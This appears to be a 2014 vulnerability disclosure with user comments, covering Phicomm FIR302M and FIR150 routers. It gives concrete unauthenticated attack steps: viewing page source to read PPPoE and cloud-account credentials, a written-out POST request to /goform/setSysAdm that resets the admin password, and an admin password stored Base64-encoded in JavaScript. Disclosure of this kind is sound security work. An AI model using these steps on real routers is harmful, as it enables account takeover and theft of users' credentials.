斐讯路由器漏洞集合(直接获取管理密码,未授权获取pppoe账号等)

震惊的是所有存储的隐私信息（包括斐讯的云账号），都保存在js里或者源码里,仅简单采用Base64编码。

测试的时候，都不是在登录状态下！

FIR302M: 软件版本 V1.0.34(官网最新的版本)

FIR150 : 软件版本 V1.0.25

1、首先是未授权获取pppoe账号：

直接访问**.**.**.**/wan_dhcp.asp 会跳转到登录界面，但是如果我们直接查看源码或者禁用JS呢。

view-source:http://**.**.**.**/wan_dhcp.asp
 源码的第101-102行 
 document.wanCfg.pppoeUser.value="7***0903***";
 document.wanCfg.pppoePass.value="2j****3r";

测试型号：

FIR150 -漏洞存在

FIR302M -漏洞存在

2、未授权直接获取斐逊的云账号。

这个FIR150和和FIR302M有所出入。

FIR302M下：

FIR302M直接访问http://**.**.**.**/cloudRegist.asp 查看源码。

第14行，包括了账号。
 var cloud_email = "*****@**.**.**.**";

第62行-64行,包括了密码。

FIR150下：

FIR150直接访问http://**.**.**.**/quick_setup1.asp查看源码。

第477行-479行,包括了密码。

3、未授权修改管理员账号密码。

POST http://**.**.**.**/goform/setSysAdm

admuser=admin&admpass=（base64编码后的密码)&admpass2nd=admpass=（base64编码后的密码)

测试型号：

FIR150 -漏洞存在

FIR302M -漏洞存在

4、最暴力的来袭（可以无视上面这些漏洞了）-直接获取管理密码

管理密码直接保存在了JS里面。

*****s/forbi*****
 

第197-198行，账号和密码都躺在了里面。
 var m_username="admin";
 var m_password="****4Nw==";

测试型号：

FIR150 -漏洞存在

FIR302M -漏洞存在

首先是未授权获取pppoe账号：

未授权修改管理员账号密码

直接获取管理密码

所有存储的隐私信息（包括斐讯的云账号），都保存在js里或者源码里,仅简单采用Base64编码，

都能直接访问，单单信任JS验证是万万不可取的，请在考虑路由器性能的同时注重路由器安全方面。（特别是其中的云账号和密码）

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2014-11-14 17:45

厂商回复：

最新状态：

暂无

1. 2015-02-10 12:55 | laoyao ( 路人 | Rank:14 漏洞数:5 | ด้้้้้็็็็็้้้้้็็็็...)

   0

   ...mark...一大波路由器沦陷

   1# 回复此人

2. 2015-02-10 13:41 | char ( 路人 | Rank:13 漏洞数:3 | 中国平安，不只保险这么简单。)

   1

   万万没想到，拉拉拉拉拉。。。

   2# 回复此人

3. 2015-02-10 19:50 | 陆由乙 ( 普通白帽子 | Rank:612 漏洞数:137 | 我是突突兔！)

   0

   你马赛克标签里的JS地址图片里就有 图片没有打马赛克

   3# 回复此人

4. 2015-02-11 12:35 | 4399gdww ( 路人 | Rank:20 漏洞数:4 | )

   0

   “别”是谁，找你什么事

   4# 回复此人